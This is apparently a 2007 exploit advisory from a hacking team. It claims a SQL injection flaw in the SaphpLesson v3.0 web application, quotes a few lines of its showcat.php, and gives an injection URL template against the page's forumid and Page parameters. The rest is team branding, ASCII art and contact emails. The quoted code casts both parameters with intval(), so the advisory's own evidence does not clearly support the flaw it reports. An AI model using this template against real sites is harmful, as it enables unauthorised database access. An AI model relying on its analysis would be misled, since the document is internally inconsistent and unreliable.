|
//////////////////2007/////////////////////
//SaphpLesson v3.0 SQL Injection Exploit//
//////////////////////////////////////////
################################
Found by:SwEET-DeViL&HaCKeR sUn#
TeaM AL-GaRNi------------------#
Application : SaphpLesson------#
version : v3.0-----------------#
URL : No-----------------------#
################################
-------------------------------------------------------------------------------
Line 19'/'23 of showcat.php ||
--------------- ||
$forumid = intval($_GET["forumid"]); ||
||
$Page = intval($_GET["Page"]); ||
||
$tit = mysql_query("select Title,CatID from forums where id=$forumid"); ||
?>-----------------------------------------------------------------------------
ExploiTs :-
""""""""""
http://www.Site.com/Path/showcat.php?forumid=1&Page=-1[SQL]);#
/*'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''/*
END
___________K-S-A______________
|=DC=DC=DC=DC=DC=DCTeam AL-GaRNi=DC=DC=DC=DC=DC=DC=DC=DC=DC=DC=DC|
:::::::::::::::::::::::::::::::::
::-###########-----###########-::
::-###########-----###########-::
::-###-------------###-----###-::
::-###-------------###########-::
::-###---######----###########-::
::-###---##-###----###--###----::
::-###------###----###---###---::
::-############----###----###--::
::-############----###----###--::
:::::::::::::::::::::::::::::::::
|=DC=DC=DC=DC=DCgamr-14@hotmail.com=DC=DC=DC=DC=DC=DC=DC|
|=DC=DC=DC=DC=DC=DC=DC=DC=DCm-o-t@msn.com=DC=DC=DC=DC=DC=DC=DC=DC=DC|